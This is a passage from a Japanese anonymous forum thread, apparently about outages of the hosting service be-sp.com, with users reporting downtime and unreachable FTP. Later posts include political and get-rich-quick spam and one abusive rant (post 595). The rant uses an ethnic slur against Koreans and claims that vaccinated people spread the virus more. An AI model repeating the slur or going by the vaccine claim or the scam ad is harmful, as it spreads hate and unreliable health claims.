578 :名無しさん@お腹いっぱい。:2009/02/09(月) 11:26:40 0.net
be-sp.com落ちてる?

579 :名無しさん@お腹いっぱい。:2009/05/11(月) 20:26:24 0.net
今落ちてる?

580 :名無しさん@お腹いっぱい。:2010/08/07(土) 09:29:52 0.net
とりあえず公式のサポ板とかには入れないし、FTPも繋がらないね。

581 : 忍法帖【Lv=40,xxxPT】(1+0:8) 【32.2m】 電脳プリオン ◆3YKmpu7JR7Ic :2012/11/24(土) 11:49:37.58 T ?PLT(12079).net
誰が入院?

582 :名無しさん@お腹いっぱい。:2013/07/08(月) NY:AN:NY.AN 0.net
おちてる?

583 :名無しさん@お腹いっぱい。:2013/09/27(金) 19:27:33.50 0.net
さっきから落ちてるっぽい

584 :名無しさん@お腹いっぱい。:2013/09/28(土) 15:59:09.03 0.net
深夜に復活したけど今また閲覧できなくなっている

585 :名無しさん@お腹いっぱい。:2013/10/22(火) 18:23:23.68 0.net
今も閲覧できません。
夕方頃に落ちるのが定例になってる気が…

586 :名無しさん@お腹いっぱい。:2013/11/25(月) 23:37:12.84 0.net
落ちた?

587 :名無しさん@お腹いっぱい。:2014/01/14(火) 22:27:59.28 0.net
今回長いなあ…

588 :名無しさん@お腹いっぱい。:2014/03/03(月) 23:51:17.77 0.net
繋がらない…
何年も使っていた鯖だから使えなくなると困るなぁ…

589 :名無しさん@お腹いっぱい。:2014/03/09(日) 14:52:22.92 0.net
ダウンが長すぎて、俺のサイトが検索結果から消えた。

590 :名無しさん@お腹いっぱい。:2014/03/09(日) 20:08:49.09 0.net
祝、復旧

591 :名無しさん@お腹いっぱい。:2014/04/09(水) 21:22:18.60 0.net
FTPすらつながりませんね。

592 :名無しさん@お腹いっぱい。:2016/06/29(水) 08:03:00.32 0.net
サポートサイトが痛すぎwww

593 :名無しさん@お腹いっぱい。:2018/02/19(月) 20:45:38.06 0.net
☆ 日本の、改憲を行いましょう。現在、衆議員と参議院の
両院で、改憲議員が3分の2を超えております。
『憲法改正国民投票法』、でググってみてください。国会の発議は
すでに可能です。平和は勝ち取るものです。お願い致します。☆☆

594 :名無しさん@お腹いっぱい。:2018/05/02(水) 05:59:16.77 0.net
確実にどんな人でも可能な在宅ワーク儲かる方法
念のためにのせておきます
グーグルで検索するといいかも『金持ちになりたい 鎌野介メソッド』

XXMM9

595 :名無しさん@お腹いっぱい。:2022/12/17(土) 22:09:20.81 ID:obkiq3AkW
断し゛て容認できないのは金正恩じゃなくて,温室効果ガスまき散らして氣候変動させて地球破壊してる国土破壊省だヴォケ>岸田増税文雄
税金で全國旅行支援もとい地球破壊支援やってIρСCやら世界中から非難されまくってる世界最悪の地球破壞腐敗テ囗国家日本
ワクチン打ったハ゛カのほうか゛ウイ儿ス拡散率が高い明確な統計すら無視して,陰性証明いらないよだのほざきなか゛ら
核ミサイルがすかしっ屁レヘ゛儿の地球破壞活動を繰り返して災害連発させながら.断し゛て容認云々寝言は寝て言えクソテ口リス├
騷音まき散らして静音か゛生命線の知的産業壊滅させてデシ゛夕ル後進國に陥れて、腐敗まみれの税金泥棒と゛もが税金泥棒公務員と結託して
小学生か゛夏休みに作ったレベルのJアラ─├(大爆笑)の税金泥棒っぷり露わにしてたり,バカチョンも対抗して日本海を汚染しようと
コ゛ミ撃ち込もうとするも陸域で爆発させて大騒ぎ.ミサヰ儿補足もできない.税金泥棒ジャクソはヰプシ□ンミサヰ儿發射見事に失敗w
日本に原爆落とした世界最悪の霸権主義國家を中心とした地球破壞テロリスト税金泥棒ポンコツ連盟─匹残らずとっとと解散しろや

創価学會員は、何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まで出てる世界最悪の殺人腐敗組織公明党を
池田センセ‐が口をきけて容認するとか本気で思ってるとしたら侮辱にもほどか゛あるぞ!
https://i.imgur.com/hnli1ga.jpeg

596 :名無しさん@お腹いっぱい。:2023/10/15(日) 02:14:14.40 0.net
わし、こっちの方がいいと思うがなぁ

103 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★